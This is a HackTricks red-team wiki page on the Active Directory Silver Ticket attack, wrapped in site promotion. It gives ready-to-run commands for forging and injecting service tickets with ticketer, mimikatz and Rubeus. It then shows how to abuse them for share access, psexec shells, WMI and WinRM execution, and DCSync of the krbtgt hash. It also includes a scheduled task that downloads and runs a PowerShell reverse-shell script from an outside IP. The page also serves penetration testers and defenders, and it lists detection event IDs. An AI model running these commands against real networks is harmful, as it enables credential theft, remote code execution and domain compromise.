Silver Ticket

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag
Discover The PEASS Family, our collection of exclusive NFTs
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Bug bounty tip: sign up for Intigriti, a premium bug bounty platform created by hackers, for hackers! Join us at https://go.intigriti.com/hacktricks today, and start earning bounties up to $100,000!

Silver ticket

The Silver Ticket attack involves the exploitation of service tickets in Active Directory (AD) environments. This method relies on acquiring the NTLM hash of a service account, such as a computer account, to forge a Ticket Granting Service (TGS) ticket. With this forged ticket, an attacker can access specific services on the network, impersonating any user, typically aiming for administrative privileges. It's emphasized that using AES keys for forging tickets is more secure and less detectable.

For ticket crafting, different tools are employed based on the operating system:

On Linux

python ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>
export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache 
python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass

On Windows

# Create the ticket
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET>"

# Inject the ticket
mimikatz.exe "kerberos::ptt <TICKET_FILE>"
.\Rubeus.exe ptt /ticket:<TICKET_FILE>

# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd

The CIFS service is highlighted as a common target for accessing the victim's file system, but other services like HOST and RPCSS can also be exploited for tasks and WMI queries.

Available Services

Service Type	Service Silver Tickets
WMI	HOST RPCSS
PowerShell Remoting	HOST HTTP Depending on OS also: WSMAN RPCSS
WinRM	HOST HTTP In some occasions you can just ask for: WINRM
Scheduled Tasks	HOST
Windows File Share, also psexec	CIFS
LDAP operations, included DCSync	LDAP
Windows Remote Server Administration Tools	RPCSS LDAP CIFS
Golden Tickets	krbtgt

Service Type

Service Silver Tickets

WMI

HOST

RPCSS

PowerShell Remoting

HOST

HTTP

Depending on OS also:

WSMAN

RPCSS

WinRM

HOST

HTTP

In some occasions you can just ask for: WINRM

Scheduled Tasks

HOST

Windows File Share, also psexec

CIFS

LDAP operations, included DCSync

LDAP

Windows Remote Server Administration Tools

RPCSS

LDAP

CIFS

Golden Tickets

krbtgt

Using Rubeus you may ask for all these tickets using the parameter:

/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm

Silver tickets Event IDs

4624: Account Logon
4634: Account Logoff
4672: Admin Logon

Abusing Service tickets

In the following examples lets imagine that the ticket is retrieved impersonating the administrator account.

CIFS

With this ticket you will be able to access the C$ and ADMIN$ folder via SMB (if they are exposed) and copy files to a part of the remote filesystem just doing something like:

dir \\vulnerable.computer\C$
dir \\vulnerable.computer\ADMIN$
copy afile.txt \\vulnerable.computer\C$\Windows\Temp

You will also be able to obtain a shell inside the host or execute arbitrary commands using psexec:

pagePsExec/Winexec/ScExec

HOST

With this permission you can generate scheduled tasks in remote computers and execute arbitrary commands:

#Check you have permissions to use schtasks over a remote server
schtasks /S some.vuln.pc
#Create scheduled task, first for exe execution, second for powershell reverse shell download
schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe"
schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
#Check it was successfully created
schtasks /query /S some.vuln.pc
#Run created schtask now
schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName"

HOST + RPCSS

With these tickets you can execute WMI in the victim system:

#Check you have enough privileges
Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local
#Execute code
Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand"

#You can also use wmic
wmic remote.computer.local list full /format:list

Find more information about wmiexec in the following page:

pageWmicExec

HOST + WSMAN (WINRM)

With winrm access over a computer you can access it and even get a PowerShell:

New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC

Check the following page to learn more ways to connect with a remote host using winrm:

pageWinRM

Note that winrm must be active and listening on the remote computer to access it.

LDAP

With this privilege you can dump the DC database using DCSync:

mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt

Learn more about DCSync in the following page:

References

pageDCSync

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag
Discover The PEASS Family, our collection of exclusive NFTs
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousSID-History Injection NextSkeleton Key

Last updated 2 months ago